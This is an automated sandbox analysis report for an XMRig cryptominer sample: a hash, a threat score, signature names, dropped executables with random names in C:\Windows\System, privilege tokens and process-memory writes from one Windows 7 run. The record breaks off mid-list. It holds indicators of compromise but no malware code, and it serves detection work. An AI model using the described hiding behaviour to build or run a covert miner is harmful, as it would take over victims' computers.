Malware Analysis Report

2025-01-17 22:28

Sample ID 240603-pywkraeh21
Target 91d42bf59806a9092dd32db035a1e769_JaffaCakes118
SHA256 978a987773971765146f833f0bcdd1949515e3265bcb7008afa8a61423eee11d
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

978a987773971765146f833f0bcdd1949515e3265bcb7008afa8a61423eee11d

Threat Level: Known bad

The file 91d42bf59806a9092dd32db035a1e769_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

xmrig

Xmrig family

XMRig Miner payload

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 12:44

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 12:44

Reported

2024-06-03 12:47

Platform

win7-20240221-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\SOoGCrK.exe N/A
N/A N/A C:\Windows\System\AMnikxA.exe N/A
N/A N/A C:\Windows\System\acxakzg.exe N/A
N/A N/A C:\Windows\System\pXzSReG.exe N/A
N/A N/A C:\Windows\System\XWWfxFp.exe N/A
N/A N/A C:\Windows\System\eUWPOzx.exe N/A
N/A N/A C:\Windows\System\bfrQjnx.exe N/A
N/A N/A C:\Windows\System\KNIfQfP.exe N/A
N/A N/A C:\Windows\System\pJSuRtd.exe N/A
N/A N/A C:\Windows\System\SpQVfYH.exe N/A
N/A N/A C:\Windows\System\opBLzAT.exe N/A
N/A N/A C:\Windows\System\WBwDDtH.exe N/A
N/A N/A C:\Windows\System\bqBflpu.exe N/A
N/A N/A C:\Windows\System\DcuyZwn.exe N/A
N/A N/A C:\Windows\System\KAuNvQR.exe N/A
N/A N/A C:\Windows\System\NQjTQrh.exe N/A
N/A N/A C:\Windows\System\hZGQPGI.exe N/A
N/A N/A C:\Windows\System\uTpVneB.exe N/A
N/A N/A C:\Windows\System\USbaVXl.exe N/A
N/A N/A C:\Windows\System\foDoYkR.exe N/A
N/A N/A C:\Windows\System\ZLWxMvX.exe N/A
N/A N/A C:\Windows\System\Sitjwla.exe N/A
N/A N/A C:\Windows\System\OhvQrSL.exe N/A
N/A N/A C:\Windows\System\usMjTnG.exe N/A
N/A N/A C:\Windows\System\VAXGrfI.exe N/A
N/A N/A C:\Windows\System\zmzhbMd.exe N/A
N/A N/A C:\Windows\System\NyUkQiF.exe N/A
N/A N/A C:\Windows\System\AWQucSh.exe N/A
N/A N/A C:\Windows\System\cxfpozJ.exe N/A
N/A N/A C:\Windows\System\aDpXoRl.exe N/A
N/A N/A C:\Windows\System\aLaewar.exe N/A
N/A N/A C:\Windows\System\YyLHryZ.exe N/A
N/A N/A C:\Windows\System\RNDkhIs.exe N/A
N/A N/A C:\Windows\System\mSkVwnR.exe N/A
N/A N/A C:\Windows\System\hiINuLp.exe N/A
N/A N/A C:\Windows\System\XVcnAkl.exe N/A
N/A N/A C:\Windows\System\RQCasBe.exe N/A
N/A N/A C:\Windows\System\JciQTgf.exe N/A
N/A N/A C:\Windows\System\ooKhfIw.exe N/A
N/A N/A C:\Windows\System\fjFezcL.exe N/A
N/A N/A C:\Windows\System\JbeGwGI.exe N/A
N/A N/A C:\Windows\System\WuVwlit.exe N/A
N/A N/A C:\Windows\System\rLKUPha.exe N/A
N/A N/A C:\Windows\System\BZZAgfM.exe N/A
N/A N/A C:\Windows\System\LCElIFz.exe N/A
N/A N/A C:\Windows\System\lChwIRA.exe N/A
N/A N/A C:\Windows\System\ybbxJuM.exe N/A
N/A N/A C:\Windows\System\fEJvvut.exe N/A
N/A N/A C:\Windows\System\ivGTzbh.exe N/A
N/A N/A C:\Windows\System\DTQWxzP.exe N/A
N/A N/A C:\Windows\System\cghcuBQ.exe N/A
N/A N/A C:\Windows\System\PvGPSCM.exe N/A
N/A N/A C:\Windows\System\isWmqmD.exe N/A
N/A N/A C:\Windows\System\XZTRnxv.exe N/A
N/A N/A C:\Windows\System\AehmnOI.exe N/A
N/A N/A C:\Windows\System\lNIwlSv.exe N/A
N/A N/A C:\Windows\System\KcdVcpU.exe N/A
N/A N/A C:\Windows\System\eoPCjlx.exe N/A
N/A N/A C:\Windows\System\leiIbsO.exe N/A
N/A N/A C:\Windows\System\rjebJFj.exe N/A
N/A N/A C:\Windows\System\MZyeXuC.exe N/A
N/A N/A C:\Windows\System\bJUfTds.exe N/A
N/A N/A C:\Windows\System\TOYDhbp.exe N/A
N/A N/A C:\Windows\System\yIxkqTD.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\wFYcgFa.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\jPLHiKx.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\ooBTdRm.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\JnDYzux.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\jAKBoNz.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\acwZgXA.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\ewRNOPI.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\WUhioqd.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\rPpYKgm.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\MubLxmt.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\QAkphqU.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\mGjVvAX.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\JxnfrTi.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\wUKwZfy.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\nhhKifN.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\DSUZFJi.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\YAQJfDw.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\ExzmLzP.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\pIkaiDa.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\ksnjVAJ.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\WoVcLgm.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\cXqWhzJ.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\GVoEnWa.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\wmFSADT.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\cafusEh.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\lEoDHwT.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\DpEWemH.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\uliFltp.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\nqEtRQO.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\XwDCcxS.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\nByaxyx.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\UYtPLNq.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\KsMmiyN.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\JbnXPvI.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\jvLaoFN.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\urFYQIF.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\qASnUvq.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\RCDeiQn.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\nMSJlkc.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\lHnjYLZ.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\zTcdIvt.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\TNluIFA.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\uZIlGNc.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\EFVAequ.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\bjBFCgA.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\dcNqZLa.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\QAnobDa.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\JDjmhfr.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\wLyQrmv.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\ivGTzbh.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\FxqaXNy.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\btVNAnr.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\SnAeQDa.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\PuGwBsF.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\fqpRvJY.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\zefBvbB.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\pAtpaFx.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\YDhlfhJ.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\XLueeRU.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\BZjZBAQ.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\AUtqJWI.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\YjFchep.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\kuEDChT.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
File created C:\Windows\System\mxlTbnl.exe C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1952 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1952 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1952 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1952 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\SOoGCrK.exe
PID 1952 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\SOoGCrK.exe
PID 1952 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\SOoGCrK.exe
PID 1952 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\acxakzg.exe
PID 1952 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\acxakzg.exe
PID 1952 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\acxakzg.exe
PID 1952 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\AMnikxA.exe
PID 1952 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\AMnikxA.exe
PID 1952 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\AMnikxA.exe
PID 1952 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\pXzSReG.exe
PID 1952 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\pXzSReG.exe
PID 1952 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\pXzSReG.exe
PID 1952 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\XWWfxFp.exe
PID 1952 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\XWWfxFp.exe
PID 1952 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\XWWfxFp.exe
PID 1952 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\eUWPOzx.exe
PID 1952 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\91d42bf59806a9092dd32db035a1e769_JaffaCakes118.exe C:\Windows\System\eUWPOzx.exe
